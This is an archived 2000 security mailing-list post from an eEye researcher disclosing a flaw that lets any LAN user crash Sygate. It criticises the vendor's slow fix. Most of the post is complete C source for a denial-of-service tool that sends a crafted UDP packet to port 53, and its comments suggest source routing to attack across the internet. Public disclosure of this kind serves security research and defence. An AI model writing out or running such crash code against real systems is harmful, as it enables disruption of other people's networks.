OSEC

Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com
 
Subject: Any LAN user can crash Sygate
From: Marc (marcEEYE.COM)
Date: Fri Jun 30 2000 - 19:03:41 CDT


This is just a nuisance to some, as I do not know of many corporate networks
that rely on a product such as Sygate. In fact I hope no corporate network
relies on Sybergen software considering the way they treat security issues.
They were contacted about this hole a while ago. They pretty much did the
usual "Well put a fix for it in the next major version update of our
software" but who cares if people are left vulnerable for months.

As you can see from http://www.sybergen.com/support/fix.htm this issue is
most likely still valid and people running Sygate are vulnerable to an
annoying exploit that can keep a companies network from "surfing the net"
yadda yadda yadda. If your a user of Sygate then send an eMail to
supportsygate.com and I am sure if enough people eMail they will write a
fix.

//Sygate Crash by: marceeye.com (April-00)
//http://www.eEye.com
//Will crash Sygate (http://www.sygate.com/) when ran from the internal LAN.
//Play with source routing to get it to work across the internet.
//Just hit the Internal IP of the Sygate machine.

#include <stdio.h>
#include <arpa/inet.h>

int main (int argc, char **argv)
{
        int SockFD, addrlen, bsent;
        struct sockaddr_in UDPSock;
        char bomb[]= "changeiscoming";

        printf("Sygate Crash by: marceeye.com\n");
        printf("http://www.eEye.com\n\n");

        if(argc<2){
                printf("Usage: %s [server]\n",argv[0]);
                exit(1);
        }

        SockFD=socket(AF_INET, SOCK_DGRAM, 0);

        UDPSock.sin_family=AF_INET;
        UDPSock.sin_addr.s_addr=inet_addr(argv[1]);
        UDPSock.sin_port=htons(53);

        bsent=sendto(SockFD,&bomb,13,0,(struct sockaddr *) &UDPSock,
sizeof(struct sockaddr_in));

        printf("Sent Crash.\nBytes Sent: %i\n",bsent);
}

Signed,
Marc Maiffret
Chief Hacking Officer
eCompany / eEye
T.949.675.8160
F.949.675.8191
http://eEye.com

_____________________________________________________________________
** TO UNSUBSCRIBE, send the command "UNSUBSCRIBE win2ksecadvice"
** FOR A WEEKLY DIGEST, send the command "SET win2ksecadvice DIGEST"
SEND ALL COMMANDS TO: listservlistserv.ntsecurity.net